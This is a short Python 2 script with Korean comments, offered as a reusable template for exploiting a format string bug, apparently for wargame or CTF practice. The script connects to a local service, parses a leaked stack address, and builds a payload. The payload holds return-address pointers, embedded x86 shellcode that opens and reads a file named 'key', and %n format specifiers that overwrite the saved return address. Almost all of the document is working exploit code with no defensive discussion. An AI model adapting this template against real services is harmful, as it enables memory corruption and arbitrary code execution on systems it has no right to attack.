Format String Bug python frame

fsb 익스플로잇 기본틀

aa
#/usr/bin/python
from socket import *
from struct import *

# 쉘코드 및 NopSled 지정
nopsled = "\x90"
sc = ""
#sc += nopsled*0x10
sc += "\x55\x89\xe5\x83\xec\x20\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x05\x6a\x79\x66\x68\x6b\x65\x89\xe3\xcd\x80\x89\xc3\xb0\x03\x8d\x4d\xe0\xb2\x21\xcd\x80\x89\xc2\xb0\x04\xb3\x04\xcd\x80\xc9\xc3"


s = socket(AF_INET, SOCK_STREAM)
s.connect(("localhost", 6665))

rv = s.recv(1024)
print rv

# 메모리 릭 프레임

## 문자열 -> int
addrStr = rv[len("Attack 0x"):-3]
addrHex = int(addrStr, 16)
print "addrHex : %X"%addrHex


# 쉘코드가 위치할 주소값 지정. 일단 buffer 값으로 잡아두고 뒤에서 보정
lowBufAddr = int(hex(addrHex)[len("0x"):len("0x")+4],16)
highBufAddr = int(hex(addrHex)[-5:-1],16)



# 버퍼의 ebp 상대주소 
buftoebp = 0x198

# 페이로드 작성
payload = ""
payload += pack('<I', addrHex+buftoebp+4)		# RET (하위주소)
payload += "AAAA"
payload += pack('<I', addrHex+buftoebp+4+2)		# RET + 2 (상위주소)
payload += "AAAA"

# 쉘코드가 위치할 주소값 계산. buf + 페이로드 길이
highBufAddr += len(payload)
print "lowBufAddr = %x"%lowBufAddr
print "highBufAddr = %x"%highBufAddr


payload += sc

# 서식문자 들어가야하는 갯수
cPercentX = 2
payload += "%08x"*cPercentX

length = 4*4 + len(sc) + 8*cPercentX


count1 = highBufAddr - length
count2 = 0x10000+lowBufAddr - highBufAddr #계산값이 음수가 되는 경우 양수계산을 위해


print "c1 : %d, c2 : %d"%(count1, count2)

payload += "%%%dc%%n"%count1
payload += "%%%dc%%n"%count2

print "length : %d"%len(payload)
print "payload : :%s"%payload
s.send(payload)


rv = s.recv(1024)
print rv

s.close()



aa